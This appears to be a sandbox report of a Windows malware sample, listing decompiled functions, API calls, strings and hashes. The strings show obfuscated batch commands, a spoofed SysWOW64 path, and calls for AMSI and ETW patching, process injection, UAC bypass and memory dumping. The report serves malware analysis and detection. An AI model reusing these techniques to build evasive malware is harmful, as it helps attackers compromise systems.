String ID: .url$@echo offset "EPD=sPDet "@% or%e%.%c%%h%.o%o%or$@echo offset "MJtc=Iet "@%r%e%%c%r%h%%o%$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\aken.pif$C:\Users\Public\alpha.pif$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\svchost.exe$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FX.c$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NEO.c$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$advapi32$bcrypt$dbgcore$endpointdlp$http$ieproxy$kernel32$lld.SLITUTEN$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$sys.thgiseurt$tquery$wintrust$@echo off@% %e%%c%o%h% %o%rrr% %%o%%f% %f%o%s%
API String ID: 2010126900-181751239
Opcode ID: 93a8abfe5f5afda1aa49349090ef5a154f488180cce3197af73fbbc257354a2d
Instruction ID: 2d1773a91aae616729086464fc62fa3df98e5ec844689987f26a65b6eff79da7
Opcode Fuzzy Hash: 93a8abfe5f5afda1aa49349090ef5a154f488180cce3197af73fbbc257354a2d
Instruction Fuzzy Hash: 45240C75A50129DFDF25EB64DC94ADE73BBBF84304F1041E2E049AB214DA31AE86EF41

Function 02CB7870 Relevance: 160.3, APIs: 5, Strings: 85, Instructions: 2771
processthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02CA881C: LoadLibraryA.KERNEL32(00000000,00000000,02CA8903), ref: 02CA8850
Part of subcall function 02CA881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02CA8903), ref: 02CA8860
Part of subcall function 02CA881C: GetProcAddress.KERNEL32(74AE0000,00000000), ref: 02CA8879
Part of subcall function 02CA881C: FreeLibrary.KERNEL32(74AE0000,00000000,02CF1388,Function_000065D8,00000004,02CF1398,02CF1388,000186A3,00000040,02CF139C,74AE0000,00000000,00000000,00000000,00000000,02CA8903), ref: 02CA88E3

CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02DE57DC,02DE5820,OpenSession,02CF137C,02CBAFD0,UacScan,02CF137C), ref: 02CB7E31
ResumeThread.KERNEL32(00000000,ScanBuffer,02CF137C,02CBAFD0,OpenSession,02CF137C,02CBAFD0,UacScan,02CF137C,02CBAFD0,ScanBuffer,02CF137C,02CBAFD0,OpenSession,02CF137C,02CBAFD0), ref: 02CB847B
CloseHandle.KERNEL32(00000000,ScanBuffer,02CF137C,02CBAFD0,OpenSession,02CF137C,02CBAFD0,UacScan,02CF137C,02CBAFD0,00000000,ScanBuffer,02CF137C,02CBAFD0,OpenSession,02CF137C), ref: 02CB85FA

Part of subcall function 02CA8798: LoadLibraryW.KERNEL32(bcrypt,?,00000864,00000000,02CF13A4,02CAA3BF,ScanString,02CF13A4,02CAA774,ScanBuffer,02CF13A4,02CAA774,Initialize,02CF13A4,02CAA774,UacScan), ref: 02CA87AC
Part of subcall function 02CA8798: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02CA87C6
Part of subcall function 02CA8798: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000864,00000000,02CF13A4,02CAA3BF,ScanString,02CF13A4,02CAA774,ScanBuffer,02CF13A4,02CAA774,Initialize), ref: 02CA8802

CloseHandle.KERNEL32(00000000,00000000,ScanBuffer,02CF137C,02CBAFD0,UacInitialize,02CF137C,02CBAFD0,ScanBuffer,02CF137C,02CBAFD0,OpenSession,02CF137C,02CBAFD0,UacScan,02CF137C), ref: 02CB89EC

Part of subcall function 02C97E10: GetFileAttributesA.KERNEL32(00000000,?,02CAF8C4,ScanString,02CF137C,02CBAFD0,OpenSession,02CF137C,02CBAFD0,ScanString,02CF137C,02CBAFD0,UacScan,02CF137C,02CBAFD0,UacInitialize), ref: 02C97E1B

Part of subcall function 02CADAC4: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02CADB96), ref: 02CADB03
Part of subcall function 02CADAC4: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02CADB3D
Part of subcall function 02CADAC4: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02CADB6A
Part of subcall function 02CADAC4: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02CADB73

Part of subcall function 02CA8184: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02CA820E), ref: 02CA81F0

ExitProcess.KERNEL32(00000000,OpenSession,02CF137C,02CBAFD0,ScanBuffer,02CF137C,02CBAFD0,Initialize,02CF137C,02CBAFD0,00000000,00000000,00000000,ScanString,02CF137C,02CBAFD0), ref: 02CBAA1D

Strings

MiniDumpWriteDump, xrefs: 02CB8996
advapi32, xrefs: 02CB8987
CryptSIPVerifyIndirectData, xrefs: 02CB989E
DlpGetWebSiteAccess, xrefs: 02CB9C09
CreateProcessW, xrefs: 02CBA12F
EnumServicesStatusA, xrefs: 02CBA0D5
ScanBuffer, xrefs: 02CB7C71, 02CB7F3E, 02CB80E4, 02CB8271, 02CB8405, 02CB8584, 02CB87FB, 02CB88F3, 02CB8D0F, 02CB8FE8, 02CB915C, 02CB9392, 02CB9424, 02CB975C, 02CB9AFA, 02CBA029, 02CBA92F
FlushInstructionCache, xrefs: 02CBA2FB
SLGetGenuineInformation, xrefs: 02CB9592
NtAlertResumeThread, xrefs: 02CB9D34
EnumServicesStatusW, xrefs: 02CBA0E4
NtSetSecurityObject, xrefs: 02CB89BE
EtwEventWriteEx, xrefs: 02CBA838
NtWriteVirtualMemory, xrefs: 02CBA7D2
NtMapViewOfSection, xrefs: 02CBA6A0
sppwmi, xrefs: 02CBA51F
psapi, xrefs: 02CB9882
SLGatherMigrationBlob, xrefs: 02CBA53B
NtQueryInformationThread, xrefs: 02CBA607
SetUnhandledExceptionFilter, xrefs: 02CBA32E
NtDeviceIoControlFile, xrefs: 02CBA0A8
psapi, xrefs: 02CBA116
CreateProcessAsUserW, xrefs: 02CBA14D, 02CBA16B
sppc, xrefs: 02CB95A9, 02CB95DC, 02CB960F, 02CB9642, 02CBA552, 02CBA585
EnumServicesStatusExA, xrefs: 02CBA0F3
VirtualAllocEx, xrefs: 02CBA22F
NtAccessCheck, xrefs: 02CBA739
dbgcore, xrefs: 02CB899B, 02CB89AF
LdrGetProcedureAddress, xrefs: 02CBA79F
RtlAllocateHeap, xrefs: 02CB9D67, 02CB9DCD
NtOpenObjectAuditAlarm, xrefs: 02CB896E
NtReadVirtualMemory, xrefs: 02CBA6D3
NtOpenSection, xrefs: 02CBA63A
UacInitialize, xrefs: 02CB8877, 02CB8C93
SxTracerGetThreadContextDebug, xrefs: 02CB9805, 02CBA4D5
LdrLoadDll, xrefs: 02CBA76C
NtOpenFile, xrefs: 02CBA805
mssip32, xrefs: 02CB98B5
spp, xrefs: 02CB981C, 02CB984F, 02CBA4EC
NtQueryDirectoryFile, xrefs: 02CBA0B7
MiniDumpReadDumpStream, xrefs: 02CB89AA
SLIsGenuineLocalEx, xrefs: 02CB95F8
NtCreateSection, xrefs: 02CBA66D
NtQueryVirtualMemory, xrefs: 02CBA5D4
RetailTracerEnable, xrefs: 02CB97D2
SLLoadApplicationPolicies, xrefs: 02CB962B
NtGetWriteWatch, xrefs: 02CBA5A1
Kernel32, xrefs: 02CBA125, 02CBA134, 02CBA170
ScanString, xrefs: 02CB7974, 02CB7BE0, 02CB8687, 02CB8A79, 02CB8E62, 02CB921E, 02CB951C, 02CB98D7, 02CB9CBE, 02CB9EB5, 02CBA45F
VirtualAlloc, xrefs: 02CBA1FC
WriteVirtualMemory, xrefs: 02CBA2C8
CreateProcessWithLogonW, xrefs: 02CBA15C
SLGetSLIDList, xrefs: 02CB95C5
NtQuerySystemInformation, xrefs: 02CBA099
EnumServicesStatusExW, xrefs: 02CBA102
Advapi, xrefs: 02CBA0DA, 02CBA0E9, 02CBA0F8, 02CBA107, 02CBA143, 02CBA152, 02CBA161
C:\Windows\System32\, xrefs: 02CB7DFB
EtwEventWrite, xrefs: 02CBA86B
GetProcessMemoryInfo, xrefs: 02CB986B
Ntdll, xrefs: 02CBA09E, 02CBA0AD, 02CBA0BC, 02CBA0CB
DlpGetArchiveFileTraceInfo, xrefs: 02CB9BD6
RtlCreateQueryDebugBuffer, xrefs: 02CB9E00
RtlQueryProcessDebugInformation, xrefs: 02CBA0C6
Initialize, xrefs: 02CB78F8, 02CB7AE8, 02CB8AF5, 02CB96E0, 02CB9A7E, 02CB9FAD, 02CBA367, 02CBA8B3
NtWaitForSingleObject, xrefs: 02CB9D9A
VirtualProtect, xrefs: 02CBA262
endpointdlp, xrefs: 02CB9B87, 02CB9BBA, 02CB9BED, 02CB9C20
OpenProcess, xrefs: 02CBA295
CreateProcessAsUserA, xrefs: 02CBA13E
DllGetClassObject, xrefs: 02CB9838, 02CBA508
SLGetEncryptedPIDEx, xrefs: 02CBA56E
CreateProcessA, xrefs: 02CBA120
tquery, xrefs: 02CB97E9
BCryptVerifySignature, xrefs: 02CB99C9
NtQuerySecurityObject, xrefs: 02CBA706
UacScan, xrefs: 02CB7B64, 02CB7CED, 02CB7E46, 02CB7FEC, 02CB8179, 02CB830D, 02CB848C, 02CB8703, 02CB8B71, 02CB8D8B, 02CB8F6C, 02CB90E0, 02CB9316, 02CBA186
kernel32, xrefs: 02CBA213, 02CBA246, 02CBA279, 02CBA2AC, 02CBA2DF, 02CBA312, 02CBA345
I_QueryTagInformation, xrefs: 02CB8982
DlpNotifyPreDragDrop, xrefs: 02CB9B70
NtOpenProcess, xrefs: 02CB89D2
ntdll, xrefs: 02CB8973, 02CB89C3, 02CB89D7, 02CB9D4B, 02CB9D7E, 02CB9DB1, 02CB9DE4, 02CB9E17, 02CBA5B8, 02CBA5EB, 02CBA61E, 02CBA651, 02CBA684, 02CBA6B7, 02CBA6EA, 02CBA71D, 02CBA750, 02CBA783, 02CBA7B6, 02CBA7E9, 02CBA81C, 02CBA84F, 02CBA882
DlpCheckIsCloudSyncApp, xrefs: 02CB9BA3
EnumProcessModules, xrefs: 02CBA111
bcrypt, xrefs: 02CB99E0
OpenSession, xrefs: 02CB787C, 02CB79F0, 02CB7A6C, 02CB7D69, 02CB7EC2, 02CB8068, 02CB81F5, 02CB8389, 02CB8508, 02CB860B, 02CB877F, 02CB89FD, 02CB8BED, 02CB8EDE, 02CB9064, 02CB929A, 02CB94A0, 02CB9664, 02CB9953, 02CB9A02, 02CB9C42, 02CB9E39, 02CB9F31, 02CBA3E3, 02CBA9AB

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: Library$CloseFileHandle$AddressCreateFreeLoadPathProcProcess$AttributesCacheExitFlushInstructionModuleNameName_ResumeThreadUserWrite
String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
API String ID: 2481178504-1225450241
Opcode ID: 2837232feb515e935a201056dca726f184c2564ed2cc47f5c62ec68f188c2791
Instruction ID: 3585d7867045a3c691e203e0fa467ff06815931ff681c41b080cfcd9b33ebee6
Opcode Fuzzy Hash: 2837232feb515e935a201056dca726f184c2564ed2cc47f5c62ec68f188c2791
Instruction Fuzzy Hash: 5A431AB5A40128DFDF25EB64DD949DE73BBBF84304F1041E2E449AB214DA31AE86EF41

Function 02C91724 Relevance: 9.0, APIs: 7, Instructions: 289
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000,?,02C91FC1), ref: 02C917D0
Sleep.KERNEL32(0000000A,00000000,?,02C91FC1), ref: 02C917E6

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: c6cbd8020f6b3688db7645abde243281b7737cab0b0cf6b3edc9723a6eb81332
Instruction ID: d4c2139503a277432d4f88cecb6fc33069df8cee91d76761aa17c24c84f50c4a
Opcode Fuzzy Hash: c6cbd8020f6b3688db7645abde243281b7737cab0b0cf6b3edc9723a6eb81332
Instruction Fuzzy Hash: 94B134B2A003528FDF15CF28D88A355BBE1EB853A0F0D86AED55D8F385C7B0A551CB90

Function 02CA8704 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 35
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(amsi), ref: 02CA870D

Part of subcall function 02CA80C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02CA8148,?,?,00000000,00000000,?,02CA8061,00000000,KernelBASE,00000000,00000000,02CA8088), ref: 02CA810D
Part of subcall function 02CA80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CA8113
Part of subcall function 02CA80C0: GetProcAddress.KERNEL32(?,?), ref: 02CA8125

Part of subcall function 02CA7CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02CA7D6C

FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02CA876C

Strings

W, xrefs: 02CA8719
DllGetClassObject, xrefs: 02CA8732
amsi, xrefs: 02CA8708

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
String ID: DllGetClassObject$W$amsi
API String ID: 941070894-2671292670
Opcode ID: 6db10336fd3c75421e6ea40b334f16c405adf270595a5bad1bdad845e3f56861
Instruction ID: 66685ab966a206059265748d74dc9864956d382c38a30a4fbd8747c4203929af
Opcode Fuzzy Hash: 6db10336fd3c75421e6ea40b334f16c405adf270595a5bad1bdad845e3f56861
Instruction Fuzzy Hash: 10F0C85054C382BAE300E674CC55F4FBFCD5B51228F048B1CB1E8962D2D679D10497B7

Function 02C91A8C Relevance: 7.7, APIs: 6, Instructions: 175
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000,?,?,00000000,02C91FE4), ref: 02C91B17
Sleep.KERNEL32(0000000A,00000000,?,?,00000000,02C91FE4), ref: 02C91B31

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 5e54109dc13896389c8d3a48031464c4889d8ac4c07ee031865995a37f2c3374
Instruction ID: eb0fbc63c4f0fa94b79905acb151d4943fb133a615f339d0f377b56a6a3b9093
Opcode Fuzzy Hash: 5e54109dc13896389c8d3a48031464c4889d8ac4c07ee031865995a37f2c3374
Instruction Fuzzy Hash: 0151F3B16413428FEF15CF68C98A756BBD1AB85324F1C86AED44CCB286D7F0C945CB91

Function 02CAE2EE Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 112
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02CAE42E

Strings

OpenSession, xrefs: 02CAE3D0
Initialize, xrefs: 02CAE31E
ScanBuffer, xrefs: 02CAE377

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: CheckConnectionInternet
String ID: Initialize$OpenSession$ScanBuffer
API String ID: 3847983778-3852638603
Opcode ID: 2eead1a982a3136d0ac5c39a95e8133c051e4bf24b565c30c421cd9099af7fa5
Instruction ID: a28250016c940ab937c5266ec8928a490452ef429d0c28bda56c683bb3f2f32d
Opcode Fuzzy Hash: 2eead1a982a3136d0ac5c39a95e8133c051e4bf24b565c30c421cd9099af7fa5
Instruction Fuzzy Hash: C0410971B501099FEF24EBE4C8A5A9EB7FEEF48718F214436E041A7240DA74AD02DF54

Function 02CA881C Relevance: 6.1, APIs: 4, Instructions: 65
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(00000000,00000000,02CA8903), ref: 02CA8850
GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02CA8903), ref: 02CA8860
GetProcAddress.KERNEL32(74AE0000,00000000), ref: 02CA8879

Part of subcall function 02CA7CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02CA7D6C

FreeLibrary.KERNEL32(74AE0000,00000000,02CF1388,Function_000065D8,00000004,02CF1398,02CF1388,000186A3,00000040,02CF139C,74AE0000,00000000,00000000,00000000,00000000,02CA8903), ref: 02CA88E3

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: Library$AddressFreeHandleLoadMemoryModuleProcVirtualWrite
String ID:
API String ID: 1543721669-0
Opcode ID: 0e2a7ed2daba39b0029f3f7331b5940af68f755c4cf2e1f913b33bb167a91de5
Instruction ID: 3b3a87370f29b2b424aa11c4f86fb4303fa851873c69c646dbb0b77325e8406f
Opcode Fuzzy Hash: 0e2a7ed2daba39b0029f3f7331b5940af68f755c4cf2e1f913b33bb167a91de5
Instruction Fuzzy Hash: 5A115EB1A40304EFEF94FBB8CC29A5E77AEEB45710F550464760CE7A80DAB4DA05AB14

Function 02CA8406 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46processCOMMON

Download Yara Rule

APIs

Part of subcall function 02CA8018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02CA8088,?,?,00000000,?,02CA79FE,ntdll,00000000,00000000,02CA7A43,?,?,00000000), ref: 02CA8056
Part of subcall function 02CA8018: GetModuleHandleA.KERNELBASE(?), ref: 02CA806A

Part of subcall function 02CA80C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02CA8148,?,?,00000000,00000000,?,02CA8061,00000000,KernelBASE,00000000,00000000,02CA8088), ref: 02CA810D
Part of subcall function 02CA80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CA8113
Part of subcall function 02CA80C0: GetProcAddress.KERNEL32(?,?), ref: 02CA8125

WinExec.KERNEL32(?,?), ref: 02CA8470

Strings

WinExec, xrefs: 02CA8421
Kernel32, xrefs: 02CA8453

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: HandleModule$AddressProc$Exec
String ID: Kernel32$WinExec
API String ID: 2292790416-3609268280
Opcode ID: 3e8cf0ffbcb85eadd2d37a625b6693fb492abf2f0712c050c0e45525a4d8dfcf
Instruction ID: 9d727110faa2906e2971e59fa3b6de66566ec6855885a5a83168516d76c0c33c
Opcode Fuzzy Hash: 3e8cf0ffbcb85eadd2d37a625b6693fb492abf2f0712c050c0e45525a4d8dfcf
Instruction Fuzzy Hash: 8801A474640208FFEB14EFA4DC35F5A77EDE748714F518521F608D7A40D674AD109B64

Function 02CA8408 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45processCOMMON

Download Yara Rule

APIs

Part of subcall function 02CA8018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02CA8088,?,?,00000000,?,02CA79FE,ntdll,00000000,00000000,02CA7A43,?,?,00000000), ref: 02CA8056
Part of subcall function 02CA8018: GetModuleHandleA.KERNELBASE(?), ref: 02CA806A

Part of subcall function 02CA80C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02CA8148,?,?,00000000,00000000,?,02CA8061,00000000,KernelBASE,00000000,00000000,02CA8088), ref: 02CA810D
Part of subcall function 02CA80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CA8113
Part of subcall function 02CA80C0: GetProcAddress.KERNEL32(?,?), ref: 02CA8125

WinExec.KERNEL32(?,?), ref: 02CA8470

Strings

WinExec, xrefs: 02CA8421
Kernel32, xrefs: 02CA8453

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: HandleModule$AddressProc$Exec
String ID: Kernel32$WinExec
API String ID: 2292790416-3609268280
Opcode ID: 6a5987156bc1bf08581904ae5080c9dbf8652eb4ca489958d8c8d76449916994
Instruction ID: 29ae43cee4bcd9786aeec38cbddfc9fedbd9a828603414569eadcc1b90016bf3
Opcode Fuzzy Hash: 6a5987156bc1bf08581904ae5080c9dbf8652eb4ca489958d8c8d76449916994
Instruction Fuzzy Hash: 3DF0A474640208FFEB14EFA4DC35F5A77EDE748714F518521F608D7A40D674A9109B64

Function 02CA5BAC Relevance: 4.6, APIs: 3, Instructions: 105fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02CA5CF4,?,?,02CA3880,00000001), ref: 02CA5C08
